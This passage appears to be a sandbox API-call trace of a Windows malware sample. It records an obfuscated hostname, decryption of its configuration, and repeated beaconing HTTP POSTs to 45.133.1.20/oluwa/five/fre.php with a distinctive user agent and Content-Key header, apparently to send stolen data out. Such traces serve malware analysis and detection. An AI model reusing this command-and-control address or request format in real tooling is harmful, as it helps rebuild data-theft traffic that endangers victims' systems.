(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.036] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.036] GetProcessHeap () returned 0x6a0000 [0185.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0185.036] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.036] GetProcessHeap () returned 0x6a0000 [0185.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0185.037] GetProcessHeap () returned 0x6a0000 [0185.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0185.038] GetProcessHeap () returned 0x6a0000 [0185.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.038] GetProcessHeap () returned 0x6a0000 [0185.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0185.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.039] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0185.058] GetProcessHeap () returned 0x6a0000 [0185.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0185.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.062] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0185.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.063] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.064] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.064] GetProcessHeap () returned 0x6a0000 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0185.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.066] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0185.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.067] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0185.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.069] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0185.069] GetProcessHeap () returned 0x6a0000 [0185.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0185.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.070] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0185.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.071] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0185.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.072] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0185.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.074] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0185.074] GetProcessHeap () returned 0x6a0000 [0185.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0185.074] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf620*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8b0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0185.074] GetProcessHeap () returned 0x6a0000 [0185.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0185.074] socket (af=2, type=1, protocol=6) returned 0x434 [0185.074] connect (s=0x434, name=0x6be8b0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0185.099] FreeAddrInfoW (pAddrInfo=0x6bf620*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8b0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0185.099] GetProcessHeap () returned 0x6a0000 [0185.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0185.099] GetProcessHeap () returned 0x6a0000 [0185.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0185.100] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.101] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.101] GetProcessHeap () returned 0x6a0000 [0185.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6a8658 [0185.101] GetProcessHeap () returned 0x6a0000 [0185.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.102] GetProcessHeap () returned 0x6a0000 [0185.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0185.102] GetProcessHeap () returned 0x6a0000 [0185.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0185.104] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.105] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.105] GetProcessHeap () returned 0x6a0000 [0185.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6a8718 [0185.105] GetProcessHeap () returned 0x6a0000 [0185.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.106] send (s=0x434, buf=0x6a8718*, len=242, flags=0) returned 242 [0185.109] send (s=0x434, buf=0x6bb998*, len=159, flags=0) returned 159 [0185.109] GetProcessHeap () returned 0x6a0000 [0185.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0185.110] recv (in: s=0x434, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0185.182] GetProcessHeap () returned 0x6a0000 [0185.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8718 | out: hHeap=0x6a0000) returned 1 [0185.183] GetProcessHeap () returned 0x6a0000 [0185.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0185.192] GetProcessHeap () returned 0x6a0000 [0185.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.192] GetProcessHeap () returned 0x6a0000 [0185.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0185.192] closesocket (s=0x434) returned 0 [0185.193] GetProcessHeap () returned 0x6a0000 [0185.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0185.193] GetProcessHeap () returned 0x6a0000 [0185.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0185.193] GetProcessHeap () returned 0x6a0000 [0185.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.194] GetProcessHeap () returned 0x6a0000 [0185.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0185.194] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1130) returned 0x434 [0185.197] Sleep (dwMilliseconds=0xea60) [0185.198] GetProcessHeap () returned 0x6a0000 [0185.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0185.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.199] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.207] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0185.213] GetProcessHeap () returned 0x6a0000 [0185.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0185.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.215] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0185.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.217] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.217] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.218] GetProcessHeap () returned 0x6a0000 [0185.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0185.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.219] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0185.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.220] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0185.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.221] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0185.221] GetProcessHeap () returned 0x6a0000 [0185.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.223] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.224] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.225] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.234] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.234] GetProcessHeap () returned 0x6a0000 [0185.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0185.234] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.234] GetProcessHeap () returned 0x6a0000 [0185.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0185.235] GetProcessHeap () returned 0x6a0000 [0185.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.235] GetProcessHeap () returned 0x6a0000 [0185.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0185.236] GetProcessHeap () returned 0x6a0000 [0185.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0185.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0185.254] GetProcessHeap () returned 0x6a0000 [0185.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0185.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.256] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0185.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.258] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.259] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.259] GetProcessHeap () returned 0x6a0000 [0185.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0185.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.260] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0185.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.263] CryptDestroyKey (hKey=0x6ad020) returned 1 [0185.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.264] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0185.264] GetProcessHeap () returned 0x6a0000 [0185.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.265] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0185.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.266] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0185.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.267] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0185.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.268] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0185.268] GetProcessHeap () returned 0x6a0000 [0185.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0185.268] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf760*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0185.268] GetProcessHeap () returned 0x6a0000 [0185.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0185.269] socket (af=2, type=1, protocol=6) returned 0x438 [0185.269] connect (s=0x438, name=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0185.293] FreeAddrInfoW (pAddrInfo=0x6bf760*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0185.293] GetProcessHeap () returned 0x6a0000 [0185.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0185.293] GetProcessHeap () returned 0x6a0000 [0185.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0185.293] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.294] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.294] GetProcessHeap () returned 0x6a0000 [0185.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0185.294] GetProcessHeap () returned 0x6a0000 [0185.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.295] GetProcessHeap () returned 0x6a0000 [0185.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0185.295] GetProcessHeap () returned 0x6a0000 [0185.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0185.296] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.297] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.297] GetProcessHeap () returned 0x6a0000 [0185.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0185.297] GetProcessHeap () returned 0x6a0000 [0185.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.298] send (s=0x438, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0185.298] send (s=0x438, buf=0x6bb998*, len=159, flags=0) returned 159 [0185.298] GetProcessHeap () returned 0x6a0000 [0185.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0185.298] recv (in: s=0x438, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0185.387] GetProcessHeap () returned 0x6a0000 [0185.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0185.387] GetProcessHeap () returned 0x6a0000 [0185.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.388] GetProcessHeap () returned 0x6a0000 [0185.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0185.389] GetProcessHeap () returned 0x6a0000 [0185.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0185.389] closesocket (s=0x438) returned 0 [0185.390] GetProcessHeap () returned 0x6a0000 [0185.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0185.390] GetProcessHeap () returned 0x6a0000 [0185.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.391] GetProcessHeap () returned 0x6a0000 [0185.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0185.391] GetProcessHeap () returned 0x6a0000 [0185.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0185.395] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1144) returned 0x438 [0185.398] Sleep (dwMilliseconds=0xea60) [0185.400] GetProcessHeap () returned 0x6a0000 [0185.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0185.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.406] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0185.424] GetProcessHeap () returned 0x6a0000 [0185.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0185.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.427] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0185.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.428] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.429] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.429] GetProcessHeap () returned 0x6a0000 [0185.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0185.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.430] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0185.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.431] CryptDestroyKey (hKey=0x6ad520) returned 1 [0185.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.440] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0185.440] GetProcessHeap () returned 0x6a0000 [0185.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.441] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.443] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.445] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.445] GetProcessHeap () returned 0x6a0000 [0185.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0185.445] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, 